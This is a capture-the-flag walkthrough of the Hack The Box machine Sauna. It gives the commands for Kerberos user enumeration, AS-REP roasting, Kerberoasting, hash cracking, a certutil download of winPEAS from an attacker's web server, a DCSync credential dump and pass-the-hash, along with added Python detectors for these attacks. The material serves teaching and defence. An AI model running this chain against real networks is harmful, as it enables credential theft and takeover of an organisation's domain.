In today’s post we will go over Sauna, an Active Directory machine from Hack The Box with interesting attack vectors. Enjoy!
1)Starting with an Nmap scan:
nmap -sC -sV -A -T4 <target_ip>
2)Since port 88 is open, what I like to do is start Kerbrute to enumerate usernames on the remote host while we enumerate the other services:
kerbrute userenum -d <DOMAIN> /usr/share/seclists/SecLists-master/Usernames/xato-net-10-million-usernames.txt --dc <DC_IP>
3)The most interesting service running here for me is definitely port 80, the web server, but before we jump on that one I wanted to make sure we check every other service available to us at the moment:
3.1)I wasn’t able to authenticate to the SMB shares as an anonymous user:
smbclient -L //<TARGET_IP> -N
3.2)Username enumeration via RPC (port 135) failed as well:
rpcclient -U "" -N <TARGET_IP>
3.3)The last thing I wanted to check was whether we could enumerate the machine further via LDAP (389, 636). For that I used windapsearch, but unfortunately for us that didn’t work either:
python3 windapsearch.py -d <DOMAIN> --dc-ip <DOMAIN_IP> -U
4)Okay, the only service left to enumerate now that we have exhausted the other options is port 80. I quickly edited my /etc/hosts file, and there we see a pretty basic website:
4.1)From here I conducted directory busting (with dirsearch and ffuf) and subdomain enumeration with ffuf as well. Neither yielded any results for me.
4.2)So at this point I didn’t have much: I had enumerated all the services on the remote host and the website didn’t give us much either. But one of the pages on the website, /about (about.html), reveals the names of the clients of this bank. That is interesting because we know port 88 is open, so we can try an ASREPRoasting attack, for which we only need usernames.
Index.html:
about.html
4.3)That definitely looks interesting, and since I didn’t know what else to try I decided to go for it. Before creating a file with potential targets, let’s also check the result of the Kerbrute enumeration:
Very interesting: I see that Kerbrute found 2 employees and an admin account, from which I can conclude that the naming convention is the first letter of the first name + last name + @EGOTISTICAL-BANK.LOCAL.
4.4)From here we can create a file with the targets we found on the website by following the naming convention that Kerbrute identified, but just to be safe I decided to use username-anarchy, an amazing script that takes a file of names and produces another file with different username variations of those names. Here is the script syntax and the final result:
First, create a file with the names from the website that we found so far:
Then let’s feed it to username-anarchy to create various combinations of those names:
./username-anarchy --input-file <TARGET_NAMES> --select-format first,flast,first.last,firstl > unames.txt
4.5)Cool, now we have a nice list of usernames. Let’s use it for an ASREPRoasting attack, to check whether any of the employees has Kerberos pre-authentication disabled:
impacket-GetNPUsers <DOMAIN_NAME>/ -usersfile unames.txt -dc-ip <DC_IP> -request -format hashcat
Bingo, we got one hit:
4.6)So from here we can conclude that we didn’t even need to spot that tiny detail on the website in about.html: if we had only used the result of Kerbrute with the ASREPRoasting attack we would have found our way in, which is good to know. Let’s try to crack the hash for user fsmith; for that I will be using hashcat:
hashcat -m 18200 hash.txt rockyou.txt
### Note that I used bare metal here for better performance ###
Checking whether I can remotely access the machine as fsmith:
evil-winrm -u fsmith -i 10.10.10.175
We got user.txt. Let’s move on to privilege escalation.
5)I loaded Bloodhound so I can enumerate the machine better. Steps to do so:
5.1)Start neo4j console
sudo neo4j console
5.2)Start bloodhound
bloodhound
5.3)Now let’s gather the data for Bloodhound
bloodhound-python -d <DOMAIN> -u <user> -p <password> -ns <DC_IP> -c all
This way I got an unexpected error:
I double-checked that everything was correct, and it was, hmmm…. I added sudo before the command and then it worked. I am leaving it here in case someone stumbles across the same issue.
5.4)Okay, so let’s see what Bloodhound has to say:
From here, by checking the shortest paths to high-value targets, we can see that the svc_loanmgr service account has DCSync rights, which is great for us as that is a very fast way to dump all the hashes from the remote host. But how do we get to svc_loanmgr? Let’s see what we can do as fsmith:
By checking the list of all Kerberoastable users, I see the user hsmith there. My initial thought here is that maybe there is password reuse between hsmith and svc_loanmgr. So I decided to check that; let’s do the Kerberoasting attack!
5.5)We will be using impacket for that one as well:
impacket-GetUserSPNs <DOMAIN_NAME>/<USERNAME>:<PASSWORD> -dc-ip <DC_IP> -request
5.6)An error: Clock skew too great. This essentially means that there is a big time difference between my machine’s clock and the clock of the remote host; let’s fix that one:
5.7)Let’s try again now:
Now it works, cool!
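On the defender's side, both requests made in steps 4.5 and 5.5 leave a fingerprint on the domain controller: a TGT request (Event ID 4768) answered without pre-authentication and with an RC4 ticket, and a service ticket request (Event ID 4769) for a user's SPN with RC4 encryption. The following is an added example, not part of the original write-up, that runs those two checks over constructed Security-log records (field names follow the Windows audit schema, values are invented; it assumes "Audit Kerberos Authentication Service" and "Audit Kerberos Service Ticket Operations" are enabled on the DC):

```python
from typing import Dict, List

RC4_HMAC = "0x17"    # etype requested by most roasting tools; AES tickets are 0x11/0x12
PREAUTH_NONE = "0"   # PreAuthType 0: the AS-REP was issued without pre-authentication


def is_asrep_roast(event: Dict[str, str]) -> bool:
    """Successful 4768 with no pre-auth and an RC4-encrypted ticket (GetNPUsers pattern)."""
    return (event["EventID"] == "4768"
            and event["PreAuthType"] == PREAUTH_NONE
            and event["TicketEncryptionType"] == RC4_HMAC
            # Status 0x19 (pre-auth required) is the normal first leg for protected
            # accounts; only a 0x0 means a crackable AS-REP actually went out.
            and event["Status"] == "0x0")


def is_kerberoast(event: Dict[str, str]) -> bool:
    """4769 asking for an RC4 service ticket for a user-owned SPN (GetUserSPNs pattern)."""
    svc = event["ServiceName"]
    return (event["EventID"] == "4769"
            and event["TicketEncryptionType"] == RC4_HMAC
            and not svc.endswith("$")        # machine accounts are not crackable targets
            and svc.lower() != "krbtgt")     # the TGS-REQ for krbtgt is ticket renewal


def hunt(events: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Group suspicious requests by technique. Domains that still rely on RC4 widely
    will be noisy here, so baseline per-account volume before alerting."""
    hits: Dict[str, List[str]] = {"asrep_roast": [], "kerberoast": []}
    for e in events:
        if is_asrep_roast(e):
            hits["asrep_roast"].append(e["TargetUserName"])
        elif is_kerberoast(e):
            hits["kerberoast"].append(f'{e["TargetUserName"]} -> {e["ServiceName"]}')
    return hits


# Constructed sample events (names and values invented for this example).
SAMPLE_EVENTS = [
    {"EventID": "4768", "TargetUserName": "fsmith", "ServiceName": "krbtgt",
     "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x0"},   # AS-REP roast
    {"EventID": "4768", "TargetUserName": "hsmith", "ServiceName": "krbtgt",
     "PreAuthType": "2", "TicketEncryptionType": "0x12", "Status": "0x0"},   # normal logon
    {"EventID": "4769", "TargetUserName": "fsmith@EGOTISTICAL-BANK.LOCAL",
     "ServiceName": "hsmith", "TicketEncryptionType": "0x17", "Status": "0x0"},  # Kerberoast
    {"EventID": "4769", "TargetUserName": "fsmith@EGOTISTICAL-BANK.LOCAL",
     "ServiceName": "SAUNA$", "TicketEncryptionType": "0x12", "Status": "0x0"},  # normal TGS
]

if __name__ == "__main__":
    print(hunt(SAMPLE_EVENTS))
```

The mitigation that removes the first signal entirely is to clear "Do not require Kerberos preauthentication" on every account; the second is reduced by giving service accounts long random passwords (gMSA) and AES-only encryption.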
5.8)Let’s try to crack the hash, again using hashcat on bare metal for better performance:
hashcat -m 13100 hash.txt rockyou.txt
Cracked, but it is the same password as fsmith, which means my idea was wrong, as I had already checked whether svc_loanmgr was using the same password as fsmith:
5.9)Okay, let’s continue our hunt for a way to escalate our privileges, which essentially means finding a password for svc_loanmgr to conduct the DCSync attack. I decided to transfer winPEAS to the remote host to speed up my enumeration:
For that you can either use the upload feature of evil-winrm, or, if you obtained the shell some other way, you can use certutil for the file transfer:
certutil -urlcache -split -f "http://10.10.10.10:8000/winpeas.exe" winpeas.exe
Also, don’t forget to start your Python web server in the directory where you have winPEAS:
python3 -m http.server
5.10)By going through the output of winPEAS, I found AutoLogon credentials for svc_loanmgr:
6)Let’s check whether they work via evil-winrm:
Great, now let’s conduct the DCSync attack; for that we will use impacket’s secretsdump:
impacket-secretsdump <DOMAIN>/<USER>@<DC_IP> -just-dc-user Administrator
Strange error again… This should work according to Bloodhound. I suspected that something might be wrong with my version of Impacket, so I decided to quickly start a Python virtual environment:
python3 -m venv venv
source venv/bin/activate
Now let’s install impacket:
pip3 install impacket
And now our DCSync attack works, great!
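A DCSync performed by a user account, as in step 6, is visible to the DC as a directory-service access event (Event ID 4662) carrying the replication control-access rights, requested by a principal that is not a domain controller. The following is an added example, not part of the original write-up, that flags such events over constructed records; it assumes "Audit Directory Service Access" is enabled with a SACL on the domain object, and the DC machine account name is invented:

```python
from typing import Dict, List, Set, Tuple

# Extended-right GUIDs for directory replication as they appear in the Properties
# field of a 4662 event (standard Active Directory schema values).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = "0x100"  # AccessMask value for "control access" (extended) rights


def replication_rights_used(properties: str) -> List[str]:
    """Names of the replication rights referenced in a 4662 Properties field."""
    props = properties.lower()
    return [name for guid, name in REPLICATION_RIGHTS.items() if guid in props]


def is_dcsync(event: Dict[str, str], known_dcs: Set[str]) -> bool:
    """Replication-style access by any principal that is not a known DC machine account."""
    if event["EventID"] != "4662" or event["AccessMask"] != CONTROL_ACCESS:
        return False
    if not replication_rights_used(event["Properties"]):
        return False
    # DCs replicate with each other all day; everything else holding these rights
    # is either a misconfiguration (the svc_loanmgr case) or an active attack.
    return event["SubjectUserName"].upper() not in known_dcs


def hunt_dcsync(events: List[Dict[str, str]], known_dcs: Set[str]) -> List[Tuple[str, List[str]]]:
    return [(e["SubjectUserName"], replication_rights_used(e["Properties"]))
            for e in events if is_dcsync(e, known_dcs)]


KNOWN_DCS = {"SAUNA$"}  # constructed: populate from your own list of DC machine accounts

# Constructed sample events (values invented for this example).
SAMPLE_EVENTS = [
    {"EventID": "4662", "SubjectUserName": "svc_loanmgr", "AccessMask": "0x100",
     "ObjectType": "domainDNS",                                  # secretsdump-style pull
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": "4662", "SubjectUserName": "SAUNA$", "AccessMask": "0x100",
     "ObjectType": "domainDNS",                                  # legitimate DC replication
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": "4662", "SubjectUserName": "fsmith", "AccessMask": "0x100",
     "ObjectType": "user",                                       # unrelated extended right
     "Properties": "{00000000-0000-0000-0000-000000000000}"},   # placeholder GUID
]

if __name__ == "__main__":
    print(hunt_dcsync(SAMPLE_EVENTS, KNOWN_DCS))
```

The same GUIDs are what Bloodhound looks for in the domain ACL to draw the DCSync edge, so auditing who holds them on the domain head is the preventive counterpart of this detection.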
6.1)From here we only need the second part of the Administrator NTLM hash (the NT hash), which we can use with evil-winrm:
Awesome, we got root.txt. GG!
Lessons Learned
1)Username enumeration and understanding the naming convention of users on remote hosts is always more than important, and a great way to do so is to use Kerbrute if port 88 is open.
2)If we feel stuck when trying to escalate privileges in Active Directory, don’t forget to look for potentially hidden credentials, both in an automated and in a manual way.
3)I had to do some troubleshooting when solving this box, where I learned that when gathering data for Bloodhound it’s a good idea to use sudo. In addition to that, if you are confident that one attack vector should work, as I was in this case for the DCSync attack, maybe there is something wrong with the script, in my case impacket. You can either install a fresh new version of it or quickly start a Python venv to check whether the issue persists with a new install.